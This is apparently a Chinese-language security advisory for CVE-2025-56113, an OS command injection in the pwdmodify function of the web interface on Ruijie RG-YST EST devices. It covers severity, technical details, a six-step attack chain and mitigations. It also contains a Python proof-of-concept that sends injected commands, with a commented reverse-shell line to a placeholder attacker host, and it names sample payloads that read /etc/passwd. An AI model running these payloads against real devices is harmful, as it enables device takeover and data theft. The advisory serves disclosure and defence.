CVE-2025-56113 锐捷RG-YST EST设备OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56113

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-YST EST, YSTAP_3.0(1)B11P280YST250F

漏洞概述

CVE-2025-56113是锐捷网络（Ruijie Networks）RG-YST系列 EST设备中存在的一个高危操作系统命令注入漏洞。该漏洞存在于设备的Web管理界面中，具体位于/usr/lib/lua/luci/modules/common.lua文件的pwdmodify功能点。攻击者可以通过构造恶意的POST请求，在未经充分验证的情况下注入并执行任意操作系统命令。由于该漏洞的CVSS评分达到8.8分，属于高危级别，且攻击复杂度低、认证要求低，攻击者可以在低权限状态下远程执行任意命令，可能导致设备完全沦陷、敏感数据泄露或进一步横向渗透。锐捷网络是一家知名的企业网络设备制造商，其产品广泛应用于企业、校园和公共网络环境中，因此该漏洞影响范围较大，需要及时修复。

技术细节

该漏洞为典型的OS命令注入（OS Command Injection）漏洞，源于应用程序对用户输入的过滤和验证不充分。在Ruijie RG-YST EST设备的Web接口中，pwdmodify功能点存在命令注入点。攻击者可以通过POST请求向该端点发送包含恶意命令的载荷，设备在处理请求时会将用户可控的参数直接拼接到系统命令中执行。具体攻击方式是利用分号、管道符或反引号等shell元字符，在原有命令基础上注入额外的系统命令。例如，攻击者可以在参数中插入类似'; whoami;'或'| cat /etc/passwd'的命令片段，设备服务器会将其作为系统命令的一部分执行。由于该漏洞影响的是系统核心模块(/usr/lib/lua/luci/modules/common.lua)，攻击者成功利用后可获得设备的完全控制权，包括读取配置文件、植入后门或进行内网渗透。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标设备为Ruijie RG-YST EST设备，确认设备版本为YSTAP_3.0(1)B11P280YST250F V1.xxV2.xx

STEP 2

步骤2

访问Web管理界面：攻击者访问设备的Web管理端口，通常为80或443端口

STEP 3

步骤3

认证（可选）：由于漏洞认证要求为低权限，攻击者可能使用低权限账号或默认凭据进行认证

STEP 4

步骤4

构造恶意请求：攻击者构造包含OS命令注入载荷的POST请求，目标是pwdmodify端点

STEP 5

步骤5

命令执行：服务器将用户输入拼接到系统命令中，攻击者的恶意命令被成功执行

STEP 6

步骤6

持久化控制：攻击者可以读取敏感配置、植入后门或建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56113 PoC - Ruijie RG-YST EST OS Command Injection
# Target: Ruijie RG-YST EST, YSTAP_3.0(1)B11P280YST250F
# Vulnerability: OS Command Injection in pwdmodify endpoint

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.local'

# Blind command injection - executes command without output
payload = "'; whoami; #"
# Or reverse shell payload
# payload = "'; bash -i >& /dev/tcp/attacker/port 0>&1; #"

data = {
    'pwdmodify': payload,
    # Additional parameters may be required based on target version
}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0'
}

try:
    response = requests.post(
        f'{target}/cgi-bin/pwdmodify',
        data=data,
        headers=headers,
        timeout=10,
        verify=False
    )
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')
except requests.exceptions.RequestException as e:
    print(f'Error: {e}')

影响范围

Ruijie RG-YST EST YSTAP_3.0(1)B11P280YST250F V1.xx

Ruijie RG-YST EST YSTAP_3.0(1)B11P280YST250F V2.xx

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 通过ACL或防火墙规则限制对设备Web管理界面的访问，仅允许受信任的管理IP；2) 禁用不必要的远程管理功能，优先使用本地Console管理；3) 监控网络流量，检测异常的POST请求模式；4) 定期更换设备管理密码；5) 考虑在独立管理VLAN中部署该设备，减少攻击面。如发现设备已被入侵，应立即断电并进行完整重装。